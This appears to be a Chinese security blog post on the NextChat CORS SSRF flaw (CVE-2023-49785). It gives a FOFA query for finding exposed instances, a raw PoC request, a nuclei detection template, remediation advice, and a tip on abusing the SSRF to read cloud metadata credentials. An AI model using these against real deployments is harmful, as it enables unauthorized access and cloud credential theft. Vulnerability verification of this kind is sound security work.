NextChat cors SSRF漏洞 (CVE-2023-49785)

漏洞描述

NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。

tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。

产品界面

fofa语法

title="NextChat"

POC

 
  1. GET /api/cors/https/www.baidu.com HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
  4. (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  5. Connection: close
  6. Accept: */*
  7. Accept-Language: en
  8. Accept-Encoding: gzip

nuclei验证

 
  1. id: CVE-2023-49785
  2. info:
  3. name: NextChat cors SSRF漏洞 (CVE-2023-49785)
  4. author: nobody
  5. severity: high
  6. description: |
  7. NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。
  8. 2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在
  9. 无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
  10. impact: |
  11. 攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等.
  12. remediation: |
  13. 升级版本,打补丁
  14. metadata:
  15. verified: true
  16. max-request: 3
  17. fofa-query: title="NextChat"
  18. tags: ai,gpt,nextchat,ssrf
  19. 修复建议
  20. 建议升级到最新版本或打补丁
  21. 非必要禁止公网访问或白名单访问
  22. requests:
  23. - raw:
  24. - |
  25. GET /api/cors/https/www.baidu.com HTTP/1.1
  26. Host: {{Hostname}}
  27. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
  28. AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0
  29. Safari/537.36
  30. Connection: close
  31. Accept: */*
  32. Accept-Language: en
  33. Accept-Encoding: gzip
  34. matchers:
  35. - type: dsl
  36. dsl:
  37. - status_code == 200 && contains_all(body,"京ICP证030173
  38. 号")

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问
  • 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值